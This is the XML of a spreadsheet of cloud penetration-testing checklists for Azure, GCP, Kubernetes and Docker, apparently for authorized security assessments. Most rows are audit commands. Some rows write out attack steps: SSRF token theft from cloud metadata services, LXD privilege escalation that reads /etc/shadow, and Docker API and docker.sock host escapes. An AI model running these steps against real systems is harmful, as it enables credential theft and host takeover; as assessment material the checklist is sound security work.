          <t>1. Test SSRF to Azure IMDS: curl 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&amp;resource=https://management.azure.com/' -H 'Metadata: true'
2. Get Key Vault token via IMDS
3. Get Graph token via IMDS
4. Use stolen token: Connect-AzAccount -AccessToken &lt;token&gt;
5. Get storage keys with stolen token</t>
        </is>
      </c>
      <c r="F10" s="5" t="inlineStr">
        <is>
          <t>Pass: SSRF to 169.254.169.254 blocked. No Managed Identity or network blocks IMDS. Fail: SSRF yields live Azure Bearer token.</t>
        </is>
      </c>
      <c r="G10" s="5" t="inlineStr">
        <is>
          <t>Not Started</t>
        </is>
      </c>
      <c r="H10" s="5" t="inlineStr"/>
    </row>
    <row r="11" ht="16" customHeight="1">
      <c r="A11" s="16" t="inlineStr">
        <is>
          <t xml:space="preserve">  Platform-Specific Attacks</t>
        </is>
      </c>
    </row>
    <row r="12" ht="60" customHeight="1">
      <c r="A12" s="4" t="inlineStr">
        <is>
          <t>CSEC-AZURE-001</t>
        </is>
      </c>
      <c r="B12" s="4" t="inlineStr">
        <is>
          <t>Azure Storage Account HTTPS &amp; TLS Enforcement</t>
        </is>
      </c>
      <c r="C12" s="4" t="inlineStr">
        <is>
          <t>Verify Azure storage accounts enforce HTTPS-only access with minimum TLS 1.2.</t>
        </is>
      </c>
      <c r="D12" s="4" t="inlineStr">
        <is>
          <t>Azure CLI, Prowler</t>
        </is>
      </c>
      <c r="E12" s="4" t="inlineStr">
        <is>
          <t>1. az storage account list --query "[*].{Name:name,HTTPS:enableHttpsTrafficOnly,TLS:minimumTlsVersion}"
2. prowler azure --checks storage_secure_transfer_to_storage_accounts_enabled
3. prowler azure --checks storage_min_tls_version_is_1_2
4. Test HTTP access: curl -s http://&lt;account&gt;.blob.core.windows.net/ (should fail)</t>
        </is>
      </c>
      <c r="F12" s="4" t="inlineStr">
        <is>
          <t>Pass: enableHttpsTrafficOnly=true, TLS1_2 on all accounts. Fail: Any account allows HTTP or uses TLS &lt; 1.2.</t>
        </is>
      </c>
      <c r="G12" s="4" t="inlineStr">
        <is>
          <t>Not Started</t>
        </is>
      </c>
      <c r="H12" s="4" t="inlineStr"/>
    </row>
    <row r="13" ht="60" customHeight="1">
      <c r="A13" s="5" t="inlineStr">
        <is>
          <t>CSEC-AZURE-002</t>
        </is>
      </c>
      <c r="B13" s="5" t="inlineStr">
        <is>
          <t>Azure Key Vault Access Policy &amp; Network Controls</t>
        </is>
      </c>
      <c r="C13" s="5" t="inlineStr">
        <is>
          <t>Assess Key Vault access policies for over-permissive grants; verify soft delete and purge protection.</t>
        </is>
      </c>
      <c r="D13" s="5" t="inlineStr">
        <is>
          <t>Azure CLI, Prowler</t>
        </is>
      </c>
      <c r="E13" s="5" t="inlineStr">
        <is>
          <t>1. az keyvault list --output table
2. az keyvault show --name &lt;vault&gt; --query {AccessPolicies,NetworkRules}
3. az keyvault secret list --vault-name &lt;vault&gt;
4. prowler azure --checks keyvault_soft_delete_is_enabled keyvault_purge_protection_is_enabled
5. Verify network defaultAction=Deny</t>
        </is>
      </c>
      <c r="F13" s="5" t="inlineStr">
        <is>
          <t>Pass: Least privilege access. Soft delete and purge protection enabled. Network restricted. Fail: Broad access or no soft delete.</t>
        </is>
      </c>
      <c r="G13" s="5" t="inlineStr">
        <is>
          <t>Not Started</t>
        </is>
      </c>
      <c r="H13" s="5" t="inlineStr"/>
    </row>
    <row r="14" ht="16" customHeight="1">
      <c r="A14" s="16" t="inlineStr">
        <is>
          <t xml:space="preserve">  Compliance, Hardening &amp; Serverless</t>
        </is>
      </c>
    </row>
    <row r="15" ht="60" customHeight="1">
      <c r="A15" s="4" t="inlineStr">
        <is>
          <t>CSEC-HARD-002</t>
        </is>
      </c>
      <c r="B15" s="4" t="inlineStr">
        <is>
          <t>CIS Azure Benchmark Automated Compliance</t>
        </is>
      </c>
      <c r="C15" s="4" t="inlineStr">
        <is>
          <t>Run comprehensive automated assessment against CIS Azure Foundations Benchmark.</t>
        </is>
      </c>
      <c r="D15" s="4" t="inlineStr">
        <is>
          <t>Prowler, ScoutSuite, Microsoft Defender for Cloud</t>
        </is>
      </c>
      <c r="E15" s="4" t="inlineStr">
        <is>
          <t>1. prowler azure --az-cli-auth --compliance cis_2.0_azure --output-formats html json
2. scout azure --cli --report-dir ./scoutsuite-azure/
3. az security assessment list --output table
4. az security secure-score-controls list --output table</t>
        </is>
      </c>
      <c r="F15" s="4" t="inlineStr">
        <is>
          <t>Pass: CIS compliance &gt; 90%. Defender Secure Score &gt; 80%. Fail: Critical CIS controls failing (MFA, HTTPS, Key Vault).</t>
        </is>
      </c>
      <c r="G15" s="4" t="inlineStr">
        <is>
          <t>Not Started</t>
        </is>
      </c>
      <c r="H15" s="4" t="inlineStr"/>
    </row>
    <row r="16" ht="60" customHeight="1">
      <c r="A16" s="5" t="inlineStr">
        <is>
          <t>CSEC-HARD-004-AZ</t>
        </is>
      </c>
      <c r="B16" s="5" t="inlineStr">
        <is>
          <t>Encryption at Rest — Azure Storage</t>
        </is>
      </c>
      <c r="C16" s="5" t="inlineStr">
        <is>
          <t>Verify all Azure data at rest is encrypted using Microsoft or customer-managed keys.</t>
        </is>
      </c>
      <c r="D16" s="5" t="inlineStr">
        <is>
          <t>Azure CLI</t>
        </is>
      </c>
      <c r="E16" s="5" t="inlineStr">
        <is>
          <t>1. az storage account list --query '[*].{Name:name,Encryption:encryption}' --output table
2. Check for customer-managed key configuration
3. Verify encryption scope settings</t>
        </is>
      </c>
      <c r="F16" s="5" t="inlineStr">
        <is>
          <t>Pass: All Azure storage accounts use encryption. Fail: Any storage resource has encryption disabled.</t>
        </is>
      </c>
      <c r="G16" s="5" t="inlineStr">
        <is>
          <t>Not Started</t>
        </is>
      </c>
      <c r="H16" s="5" t="inlineStr"/>
    </row>
    <row r="17" ht="60" customHeight="1">
      <c r="A17" s="4" t="inlineStr">
        <is>
          <t>CSEC-SLS-005</t>
        </is>
      </c>
      <c r="B17" s="4" t="inlineStr">
        <is>
          <t>Azure Function &amp; Serverless Security Assessment</t>
        </is>
      </c>
      <c r="C17" s="4" t="inlineStr">
        <is>
          <t>Assess Azure Function Apps for exposed URLs, hardcoded connection strings, over-privileged managed identities.</t>
        </is>
      </c>
      <c r="D17" s="4" t="inlineStr">
        <is>
          <t>Azure CLI, Prowler, curl</t>
        </is>
      </c>
      <c r="E17" s="4" t="inlineStr">
        <is>
          <t>1. az functionapp list --query "[*].{Name:name,URL:defaultHostName,State:state}"
2. Check authLevel (should not be anonymous)
3. az functionapp config appsettings list (look for hardcoded secrets)
4. az functionapp identity show ...
5. Test function URL without key: curl https://&lt;app&gt;.azurewebsites.net/api/&lt;function&gt;</t>
        </is>
      </c>
      <c r="F17" s="4" t="inlineStr">
        <is>
          <t>Pass: All functions require auth. No secrets in app settings. Fail: Anonymous function URLs or hardcoded secrets.</t>
        </is>
      </c>
      <c r="G17" s="4" t="inlineStr">
        <is>
          <t>Not Started</t>
        </is>
      </c>
      <c r="H17" s="4" t="inlineStr"/>
    </row>
  </sheetData>
  <autoFilter ref="A3:H3"/>
  <mergeCells count="7">
    <mergeCell ref="A9:H9"/>
    <mergeCell ref="A4:H4"/>
    <mergeCell ref="A7:H7"/>
    <mergeCell ref="A2:H2"/>
    <mergeCell ref="A11:H11"/>
    <mergeCell ref="A14:H14"/>
    <mergeCell ref="A1:H1"/>
  </mergeCells>
  <dataValidations count="1">
    <dataValidation sqref="G4:G17" showDropDown="0" showInputMessage="0" showErrorMessage="0" allowBlank="1" type="list">
      <formula1>"Not Started,In Progress,Pass,Fail,N/A,Needs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73E8"/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8" customWidth="1" min="4" max="4"/>
    <col width="60" customWidth="1" min="5" max="5"/>
    <col width="42" customWidth="1" min="6" max="6"/>
    <col width="14" customWidth="1" min="7" max="7"/>
    <col width="30" customWidth="1" min="8" max="8"/>
  </cols>
  <sheetData>
    <row r="1" ht="32" customHeight="1">
      <c r="A1" s="17" t="inlineStr">
        <is>
          <t>☁  GCP Security Testing Checklist</t>
        </is>
      </c>
    </row>
    <row r="2" ht="18" customHeight="1">
      <c r="A2" s="18" t="inlineStr">
        <is>
          <t>CEH v13 · CIS GCP Foundations Benchmark · Google Cloud Security Best Practices</t>
        </is>
      </c>
    </row>
    <row r="3" ht="22" customHeight="1">
      <c r="A3" s="19" t="inlineStr">
        <is>
          <t>Test ID</t>
        </is>
      </c>
      <c r="B3" s="19" t="inlineStr">
        <is>
          <t>Test Name</t>
        </is>
      </c>
      <c r="C3" s="19" t="inlineStr">
        <is>
          <t>Objective</t>
        </is>
      </c>
      <c r="D3" s="19" t="inlineStr">
        <is>
          <t>Tools</t>
        </is>
      </c>
      <c r="E3" s="19" t="inlineStr">
        <is>
          <t>Methodology Summary</t>
        </is>
      </c>
      <c r="F3" s="19" t="inlineStr">
        <is>
          <t>Pass/Fail Criteria</t>
        </is>
      </c>
      <c r="G3" s="19" t="inlineStr">
        <is>
          <t>Status</t>
        </is>
      </c>
      <c r="H3" s="19" t="inlineStr">
        <is>
          <t>Notes</t>
        </is>
      </c>
    </row>
    <row r="4" ht="16" customHeight="1">
      <c r="A4" s="20" t="inlineStr">
        <is>
          <t xml:space="preserve">  GCP IAM &amp; Service Account Security</t>
        </is>
      </c>
    </row>
    <row r="5" ht="60" customHeight="1">
      <c r="A5" s="4" t="inlineStr">
        <is>
          <t>CSEC-IAM-006</t>
        </is>
      </c>
      <c r="B5" s="4" t="inlineStr">
        <is>
          <t>GCP IAM Policy &amp; Service Account Key Enumeration</t>
        </is>
      </c>
      <c r="C5" s="4" t="inlineStr">
        <is>
          <t>Enumerate all GCP project IAM bindings, service accounts, and service account keys to identify over-privileged identities.</t>
        </is>
      </c>
      <c r="D5" s="4" t="inlineStr">
        <is>
          <t>gcloud CLI, GCP Scanner</t>
        </is>
      </c>
      <c r="E5" s="4" t="inlineStr">
        <is>
          <t>1. gcloud projects get-iam-policy &lt;project-id&gt; --format=json
2. gcloud iam service-accounts list --format="table(email,disabled)"
3. gcloud iam service-accounts keys list --iam-account &lt;sa-email&gt;
4. Check for USER_MANAGED keys (high risk)
5. python3 gcp_scanner.py -k /path/to/key.json -o ./results/
6. Check for roles/owner or roles/editor on external accounts</t>
        </is>
      </c>
      <c r="F5" s="4" t="inlineStr">
        <is>
          <t>Pass: Least privilege IAM. No external Owner/Editor roles. No USER_MANAGED keys. Fail: Over-permissive bindings or exposed keys.</t>
        </is>
      </c>
      <c r="G5" s="4" t="inlineStr">
        <is>
          <t>Not Started</t>
        </is>
      </c>
      <c r="H5" s="4" t="inlineStr"/>
    </row>
    <row r="6" ht="60" customHeight="1">
      <c r="A6" s="5" t="inlineStr">
        <is>
          <t>CSEC-IAM-007-GCP</t>
        </is>
      </c>
      <c r="B6" s="5" t="inlineStr">
        <is>
          <t>MFA Enforcement Assessment (GCP)</t>
        </is>
      </c>
      <c r="C6" s="5" t="inlineStr">
        <is>
          <t>Verify MFA is enforced for all GCP console users, especially those with Owner/Editor roles.</t>
        </is>
      </c>
      <c r="D6" s="5" t="inlineStr">
        <is>
          <t>gcloud CLI, Prowler</t>
        </is>
      </c>
      <c r="E6" s="5" t="inlineStr">
        <is>
          <t>1. Check org policy: gcloud org-policies describe constraints/iam.disableServiceAccountKeyCreation
2. Review admin users in Cloud IAM
3. Verify 2-Step Verification enforcement via Google Workspace Admin</t>
        </is>
      </c>
      <c r="F6" s="5" t="inlineStr">
        <is>
          <t>Pass: MFA enforced for all users. Fail: Any GCP user lacks MFA enforcement.</t>
        </is>
      </c>
      <c r="G6" s="5" t="inlineStr">
        <is>
          <t>Not Started</t>
        </is>
      </c>
      <c r="H6" s="5" t="inlineStr"/>
    </row>
    <row r="7" ht="16" customHeight="1">
      <c r="A7" s="20" t="inlineStr">
        <is>
          <t xml:space="preserve">  GCS Storage Security</t>
        </is>
      </c>
    </row>
    <row r="8" ht="60" customHeight="1">
      <c r="A8" s="4" t="inlineStr">
        <is>
          <t>CSEC-STOR-005</t>
        </is>
      </c>
      <c r="B8" s="4" t="inlineStr">
        <is>
          <t>GCS Bucket IAM Policy &amp; Public Access Assessment</t>
        </is>
      </c>
      <c r="C8" s="4" t="inlineStr">
        <is>
          <t>Check GCS bucket IAM policies for allUsers or allAuthenticatedUsers bindings allowing public access.</t>
        </is>
      </c>
      <c r="D8" s="4" t="inlineStr">
        <is>
          <t>gsutil, gcloud CLI</t>
        </is>
      </c>
      <c r="E8" s="4" t="inlineStr">
        <is>
          <t>1. gsutil iam get gs://&lt;bucket-name&gt;
2. Look for allUsers (anyone) or allAuthenticatedUsers bindings
3. Test anonymous: gsutil ls gs://&lt;bucket-name&gt; (without credentials)
4. Test download: curl -O "https://storage.googleapis.com/&lt;bucket&gt;/&lt;file&gt;"
5. gcloud storage buckets describe gs://&lt;bucket&gt; --format="json(iamConfiguration)"</t>
        </is>
      </c>
      <c r="F8" s="4" t="inlineStr">
        <is>
          <t>Pass: No allUsers/allAuthenticatedUsers bindings. Anonymous access returns AccessDenied. Fail: Bucket publicly readable.</t>
        </is>
      </c>
      <c r="G8" s="4" t="inlineStr">
        <is>
          <t>Not Started</t>
        </is>
      </c>
      <c r="H8" s="4" t="inlineStr"/>
    </row>
    <row r="9" ht="16" customHeight="1">
      <c r="A9" s="20" t="inlineStr">
        <is>
          <t xml:space="preserve">  SSRF &amp; Metadata Credential Theft</t>
        </is>
      </c>
    </row>
    <row r="10" ht="60" customHeight="1">
      <c r="A10" s="5" t="inlineStr">
        <is>
          <t>CSEC-CRED-003</t>
        </is>
      </c>
      <c r="B10" s="5" t="inlineStr">
        <is>
          <t>SSRF to GCP Metadata Server Credential Theft</t>
        </is>
      </c>
      <c r="C10" s="5" t="inlineStr">
        <is>
          <t>Test SSRF in GCP-hosted apps to steal service account OAuth tokens from GCP metadata server.</t>
        </is>
      </c>
      <c r="D10" s="5" t="inlineStr">
        <is>
          <t>curl, Burp Suite, gcloud CLI</t>
        </is>
      </c>
      <c r="E10" s="5" t="inlineStr">
        <is>
          <t>1. Test: curl 'http://metadata.google.internal/computeMetadata/v1/' -H 'Metadata-Flavor: Google'
2. Get service accounts: .../instance/service-accounts/
3. Steal OAuth token: .../service-accounts/default/token
4. Use token: curl -H "Authorization: Bearer &lt;token&gt;" https://storage.googleapis.com/...
5. List GCE instances with stolen token</t>
        </is>
      </c>
      <c r="F10" s="5" t="inlineStr">
        <is>
          <t>Pass: GCP metadata server inaccessible via SSRF. Fail: Service account OAuth token stolen via SSRF.</t>
        </is>
      </c>
      <c r="G10" s="5" t="inlineStr">
        <is>
          <t>Not Started</t>
        </is>
      </c>
      <c r="H10" s="5" t="inlineStr"/>
    </row>
    <row r="11" ht="16" customHeight="1">
      <c r="A11" s="20" t="inlineStr">
        <is>
          <t xml:space="preserve">  Platform-Specific Attacks</t>
        </is>
      </c>
    </row>
    <row r="12" ht="60" customHeight="1">
      <c r="A12" s="4" t="inlineStr">
        <is>
          <t>CSEC-GCP-001</t>
        </is>
      </c>
      <c r="B12" s="4" t="inlineStr">
        <is>
          <t>GCP IAM Overly Permissive Role Binding Detection</t>
        </is>
      </c>
      <c r="C12" s="4" t="inlineStr">
        <is>
          <t>Identify GCP IAM bindings granting primitive roles at project level to external users or allUsers.</t>
        </is>
      </c>
      <c r="D12" s="4" t="inlineStr">
        <is>
          <t>gcloud CLI, GCP Scanner</t>
        </is>
      </c>
      <c r="E12" s="4" t="inlineStr">
        <is>
          <t>1. gcloud projects get-iam-policy &lt;project-id&gt; --format=json
2. Check for roles/owner or roles/editor on external accounts
3. Check allUsers (critical)
4. Check allAuthenticatedUsers
5. python3 scanner.py -k /path/to/key.json -o ./results/
6. gcloud iam service-accounts keys list --iam-account &lt;sa-email&gt;</t>
        </is>
      </c>
      <c r="F12" s="4" t="inlineStr">
        <is>
          <t>Pass: No allUsers bindings. No primitive roles on external accounts. Fail: allUsers has any permission or external Owner/Editor.</t>
        </is>
      </c>
      <c r="G12" s="4" t="inlineStr">
        <is>
          <t>Not Started</t>
        </is>
      </c>
      <c r="H12" s="4" t="inlineStr"/>
    </row>
    <row r="13" ht="16" customHeight="1">
      <c r="A13" s="20" t="inlineStr">
        <is>
          <t xml:space="preserve">  Compliance &amp; Hardening</t>
        </is>
      </c>
    </row>
    <row r="14" ht="60" customHeight="1">
      <c r="A14" s="5" t="inlineStr">
        <is>
          <t>CSEC-HARD-003</t>
        </is>
      </c>
      <c r="B14" s="5" t="inlineStr">
        <is>
          <t>CIS GCP Benchmark Automated Compliance</t>
        </is>
      </c>
      <c r="C14" s="5" t="inlineStr">
        <is>
          <t>Run comprehensive automated assessment against CIS GCP Foundations Benchmark.</t>
        </is>
      </c>
      <c r="D14" s="5" t="inlineStr">
        <is>
          <t>Prowler, ScoutSuite, GCP Security Command Center</t>
        </is>
      </c>
      <c r="E14" s="5" t="inlineStr">
        <is>
          <t>1. prowler gcp --project-ids &lt;id&gt; --compliance cis_3.0_gcp --output-formats html json
2. scout gcp --user-account --project-id &lt;id&gt;
3. gcloud scc findings list --filter='state=ACTIVE AND severity=CRITICAL'
4. prowler gcp --checks iam_sa_no_admin_privileges compute_firewall_rule_ssh_access_not_allowed_from_internet
5. gcloud logging sinks list</t>
        </is>
      </c>
      <c r="F14" s="5" t="inlineStr">
        <is>
          <t>Pass: CIS compliance &gt; 90%. No critical firewall rules. Audit logging enabled. Fail: Critical findings in firewall/IAM/audit.</t>
        </is>
      </c>
      <c r="G14" s="5" t="inlineStr">
        <is>
          <t>Not Started</t>
        </is>
      </c>
      <c r="H14" s="5" t="inlineStr"/>
    </row>
    <row r="15" ht="60" customHeight="1">
      <c r="A15" s="4" t="inlineStr">
        <is>
          <t>CSEC-HARD-004-GCP</t>
        </is>
      </c>
      <c r="B15" s="4" t="inlineStr">
        <is>
          <t>Encryption at Rest — GCP Storage</t>
        </is>
      </c>
      <c r="C15" s="4" t="inlineStr">
        <is>
          <t>Verify all GCP data at rest (GCS, Cloud SQL, Persistent Disks) is encrypted.</t>
        </is>
      </c>
      <c r="D15" s="4" t="inlineStr">
        <is>
          <t>gcloud CLI</t>
        </is>
      </c>
      <c r="E15" s="4" t="inlineStr">
        <is>
          <t>1. Check GCS bucket encryption: gsutil encryption get gs://&lt;bucket&gt;
2. Cloud SQL: gcloud sql instances describe &lt;name&gt; --query diskEncryptionConfiguration
3. Compute disks: gcloud compute disks list --format='table(name,diskEncryptionKey)'
4. Verify CMEK configuration for sensitive workloads</t>
        </is>
      </c>
      <c r="F15" s="4" t="inlineStr">
        <is>
          <t>Pass: All GCP storage encrypted. Sensitive data uses CMEK. Fail: Any storage without encryption.</t>
        </is>
      </c>
      <c r="G15" s="4" t="inlineStr">
        <is>
          <t>Not Started</t>
        </is>
      </c>
      <c r="H15" s="4" t="inlineStr"/>
    </row>
  </sheetData>
  <autoFilter ref="A3:H3"/>
  <mergeCells count="7">
    <mergeCell ref="A9:H9"/>
    <mergeCell ref="A4:H4"/>
    <mergeCell ref="A7:H7"/>
    <mergeCell ref="A2:H2"/>
    <mergeCell ref="A13:H13"/>
    <mergeCell ref="A11:H11"/>
    <mergeCell ref="A1:H1"/>
  </mergeCells>
  <dataValidations count="1">
    <dataValidation sqref="G4:G15" showDropDown="0" showInputMessage="0" showErrorMessage="0" allowBlank="1" type="list">
      <formula1>"Not Started,In Progress,Pass,Fail,N/A,Needs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26CE5"/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8" customWidth="1" min="4" max="4"/>
    <col width="60" customWidth="1" min="5" max="5"/>
    <col width="42" customWidth="1" min="6" max="6"/>
    <col width="14" customWidth="1" min="7" max="7"/>
    <col width="30" customWidth="1" min="8" max="8"/>
  </cols>
  <sheetData>
    <row r="1" ht="32" customHeight="1">
      <c r="A1" s="21" t="inlineStr">
        <is>
          <t>☸  Kubernetes Security Testing Checklist</t>
        </is>
      </c>
    </row>
    <row r="2" ht="18" customHeight="1">
      <c r="A2" s="22" t="inlineStr">
        <is>
          <t>CIS Kubernetes Benchmark · CNCF Security Whitepaper · kube-bench / kube-hunter</t>
        </is>
      </c>
    </row>
    <row r="3" ht="22" customHeight="1">
      <c r="A3" s="23" t="inlineStr">
        <is>
          <t>Test ID</t>
        </is>
      </c>
      <c r="B3" s="23" t="inlineStr">
        <is>
          <t>Test Name</t>
        </is>
      </c>
      <c r="C3" s="23" t="inlineStr">
        <is>
          <t>Objective</t>
        </is>
      </c>
      <c r="D3" s="23" t="inlineStr">
        <is>
          <t>Tools</t>
        </is>
      </c>
      <c r="E3" s="23" t="inlineStr">
        <is>
          <t>Methodology Summary</t>
        </is>
      </c>
      <c r="F3" s="23" t="inlineStr">
        <is>
          <t>Pass/Fail Criteria</t>
        </is>
      </c>
      <c r="G3" s="23" t="inlineStr">
        <is>
          <t>Status</t>
        </is>
      </c>
      <c r="H3" s="23" t="inlineStr">
        <is>
          <t>Notes</t>
        </is>
      </c>
    </row>
    <row r="4" ht="16" customHeight="1">
      <c r="A4" s="24" t="inlineStr">
        <is>
          <t xml:space="preserve">  Cluster Security Assessment</t>
        </is>
      </c>
    </row>
    <row r="5" ht="60" customHeight="1">
      <c r="A5" s="4" t="inlineStr">
        <is>
          <t>CSEC-COMPUTE-005</t>
        </is>
      </c>
      <c r="B5" s="4" t="inlineStr">
        <is>
          <t>Kubernetes Cluster Security Assessment</t>
        </is>
      </c>
      <c r="C5" s="4" t="inlineStr">
        <is>
          <t>Enumerate cluster resources, test RBAC, identify privileged pods, decode secrets, run kube-hunter.</t>
        </is>
      </c>
      <c r="D5" s="4" t="inlineStr">
        <is>
          <t>kubectl, kube-hunter, kube-bench</t>
        </is>
      </c>
      <c r="E5" s="4" t="inlineStr">
        <is>
          <t>1. kubectl get pods --all-namespaces -o wide
2. kubectl auth can-i --list --all-namespaces
3. Decode secrets: kubectl get secret &lt;name&gt; -o jsonpath='{.data.password}' | base64 --decode
4. Find privileged pods: kubectl get pods -A -o json | check securityContext.privileged
5. kube-hunter --remote &lt;k8s-api-ip&gt; --report json
6. kube-bench (CIS Benchmark check)</t>
        </is>
      </c>
      <c r="F5" s="4" t="inlineStr">
        <is>
          <t>Pass: No privileged pods. Secrets encrypted at rest. RBAC least privilege. API requires auth. Fail: Privileged pods or anonymous API access.</t>
        </is>
      </c>
      <c r="G5" s="4" t="inlineStr">
        <is>
          <t>Not Started</t>
        </is>
      </c>
      <c r="H5" s="4" t="inlineStr"/>
    </row>
    <row r="6" ht="60" customHeight="1">
      <c r="A6" s="5" t="inlineStr">
        <is>
          <t>CSEC-COMPUTE-006</t>
        </is>
      </c>
      <c r="B6" s="5" t="inlineStr">
        <is>
          <t>LXD/LXC Group Privilege Escalation Testing</t>
        </is>
      </c>
      <c r="C6" s="5" t="inlineStr">
        <is>
          <t>Test if lxd group membership can be exploited to mount host filesystem and achieve root on host OS.</t>
        </is>
      </c>
      <c r="D6" s="5" t="inlineStr">
        <is>
          <t>lxc, lxd, Alpine image</t>
        </is>
      </c>
      <c r="E6" s="5" t="inlineStr">
        <is>
          <t>1. Check group: id | grep lxd
2. Import Alpine image: lxc image import lxd.tar.xz rootfs.squashfs --alias alpine-priv-esc
3. Launch privileged container: lxc init alpine-priv-esc privesc -c security.privileged=true
4. Mount host: lxc config device add privesc host-root disk source=/ path=/mnt/root
5. lxc start privesc; lxc exec privesc -- sh
6. cat /mnt/root/etc/shadow</t>
        </is>
      </c>
      <c r="F6" s="5" t="inlineStr">
        <is>
          <t>Pass: User not in lxd group. LXD not installed or restricted. Fail: lxd group allows host filesystem access and root escalation.</t>
        </is>
      </c>
      <c r="G6" s="5" t="inlineStr">
        <is>
          <t>Not Started</t>
        </is>
      </c>
      <c r="H6" s="5" t="inlineStr"/>
    </row>
    <row r="7" ht="16" customHeight="1">
      <c r="A7" s="24" t="inlineStr">
        <is>
          <t xml:space="preserve">  CIS Benchmark &amp; Hardening</t>
        </is>
      </c>
    </row>
    <row r="8" ht="60" customHeight="1">
      <c r="A8" s="4" t="inlineStr">
        <is>
          <t>CSEC-HARD-005</t>
        </is>
      </c>
      <c r="B8" s="4" t="inlineStr">
        <is>
          <t>Kubernetes CIS Benchmark Assessment</t>
        </is>
      </c>
      <c r="C8" s="4" t="inlineStr">
        <is>
          <t>Run CIS Kubernetes Benchmark checks on all cluster nodes and API server.</t>
        </is>
      </c>
      <c r="D8" s="4" t="inlineStr">
        <is>
          <t>kube-bench, kube-hunter, kubectl</t>
        </is>
      </c>
      <c r="E8" s="4" t="inlineStr">
        <is>
          <t>1. docker run aquasec/kube-bench:latest master
2. docker run aquasec/kube-bench:latest node
3. kube-hunter --remote &lt;k8s-api-ip&gt; --report json &gt; kube-hunter.json
4. kubectl get --raw /api/v1/secrets | verify encrypted at rest
5. prowler kubernetes --services etcd apiserver
6. kubectl get networkpolicies --all-namespaces</t>
        </is>
      </c>
      <c r="F8" s="4" t="inlineStr">
        <is>
          <t>Pass: Minimal WARN/FAIL from kube-bench. Etcd encrypted. NetworkPolicies in place. API requires auth. Fail: Critical kube-bench findings.</t>
        </is>
      </c>
      <c r="G8" s="4" t="inlineStr">
        <is>
          <t>Not Started</t>
        </is>
      </c>
      <c r="H8" s="4" t="inlineStr"/>
    </row>
  </sheetData>
  <autoFilter ref="A3:H3"/>
  <mergeCells count="4">
    <mergeCell ref="A7:H7"/>
    <mergeCell ref="A4:H4"/>
    <mergeCell ref="A2:H2"/>
    <mergeCell ref="A1:H1"/>
  </mergeCells>
  <dataValidations count="1">
    <dataValidation sqref="G4:G8" showDropDown="0" showInputMessage="0" showErrorMessage="0" allowBlank="1" type="list">
      <formula1>"Not Started,In Progress,Pass,Fail,N/A,Needs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496ED"/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8" customWidth="1" min="4" max="4"/>
    <col width="60" customWidth="1" min="5" max="5"/>
    <col width="42" customWidth="1" min="6" max="6"/>
    <col width="14" customWidth="1" min="7" max="7"/>
    <col width="30" customWidth="1" min="8" max="8"/>
  </cols>
  <sheetData>
    <row r="1" ht="32" customHeight="1">
      <c r="A1" s="25" t="inlineStr">
        <is>
          <t>🐳 Docker Security Testing Checklist</t>
        </is>
      </c>
    </row>
    <row r="2" ht="18" customHeight="1">
      <c r="A2" s="22" t="inlineStr">
        <is>
          <t>CIS Docker Benchmark · NIST Container Security Guide</t>
        </is>
      </c>
    </row>
    <row r="3" ht="22" customHeight="1">
      <c r="A3" s="26" t="inlineStr">
        <is>
          <t>Test ID</t>
        </is>
      </c>
      <c r="B3" s="26" t="inlineStr">
        <is>
          <t>Test Name</t>
        </is>
      </c>
      <c r="C3" s="26" t="inlineStr">
        <is>
          <t>Objective</t>
        </is>
      </c>
      <c r="D3" s="26" t="inlineStr">
        <is>
          <t>Tools</t>
        </is>
      </c>
      <c r="E3" s="26" t="inlineStr">
        <is>
          <t>Methodology Summary</t>
        </is>
      </c>
      <c r="F3" s="26" t="inlineStr">
        <is>
          <t>Pass/Fail Criteria</t>
        </is>
      </c>
      <c r="G3" s="26" t="inlineStr">
        <is>
          <t>Status</t>
        </is>
      </c>
      <c r="H3" s="26" t="inlineStr">
        <is>
          <t>Notes</t>
        </is>
      </c>
    </row>
    <row r="4" ht="16" customHeight="1">
      <c r="A4" s="27" t="inlineStr">
        <is>
          <t xml:space="preserve">  Docker API &amp; Container Escape</t>
        </is>
      </c>
    </row>
    <row r="5" ht="60" customHeight="1">
      <c r="A5" s="4" t="inlineStr">
        <is>
          <t>CSEC-COMPUTE-003</t>
        </is>
      </c>
      <c r="B5" s="4" t="inlineStr">
        <is>
          <t>Exposed Docker API Exploitation Assessment</t>
        </is>
      </c>
      <c r="C5" s="4" t="inlineStr">
        <is>
          <t>Identify and test exposed Docker daemon APIs on TCP ports 2375/2376 granting unauthenticated full container host control.</t>
        </is>
      </c>
      <c r="D5" s="4" t="inlineStr">
        <is>
          <t>docker CLI, curl, nmap</t>
        </is>
      </c>
      <c r="E5" s="4" t="inlineStr">
        <is>
          <t>1. Test API: curl -s http://&lt;target-ip&gt;:2375/info | python3 -m json.tool
2. List containers: docker -H tcp://&lt;target-ip&gt;:2375 ps -a
3. Read env vars: docker -H tcp://&lt;target-ip&gt;:2375 exec -i &lt;container&gt; env
4. Escape to host: docker -H tcp://&lt;target-ip&gt;:2375 run -it --privileged -v /:/host ubuntu:latest chroot /host bash
5. nmap -p 2375,2376 --script docker-version &lt;target&gt;</t>
        </is>
      </c>
      <c r="F5" s="4" t="inlineStr">
        <is>
          <t>Pass: Docker daemon not exposed on TCP. Port 2376 requires valid client cert. Fail: Unauthenticated Docker API allows host escape.</t>
        </is>
      </c>
      <c r="G5" s="4" t="inlineStr">
        <is>
          <t>Not Started</t>
        </is>
      </c>
      <c r="H5" s="4" t="inlineStr"/>
    </row>
    <row r="6" ht="60" customHeight="1">
      <c r="A6" s="5" t="inlineStr">
        <is>
          <t>CSEC-COMPUTE-004</t>
        </is>
      </c>
      <c r="B6" s="5" t="inlineStr">
        <is>
          <t>Container Security Assessment (from Inside)</t>
        </is>
      </c>
      <c r="C6" s="5" t="inlineStr">
        <is>
          <t>From within a container, assess escape possibility via privileged mode, host mounts, Docker socket exposure.</t>
        </is>
      </c>
      <c r="D6" s="5" t="inlineStr">
        <is>
          <t>Linux shell commands, docker CLI</t>
        </is>
      </c>
      <c r="E6" s="5" t="inlineStr">
        <is>
          <t>1. Check root: id; whoami
2. Check privileged: cat /proc/self/status | grep CapEff
3. Check Docker socket: ls -la /var/run/docker.sock
4. If socket exists — escape via: docker -H unix:///var/run/docker.sock run --privileged -v /:/host
5. Check host mounts: mount | grep -E "proc|sys|dev|host"
6. Check env secrets: env | grep -iE "password|secret|key|token|api"</t>
        </is>
      </c>
      <c r="F6" s="5" t="inlineStr">
        <is>
          <t>Pass: Non-root, no Docker socket mount, no privileged flag, no host FS access. Fail: Container escape possible.</t>
        </is>
      </c>
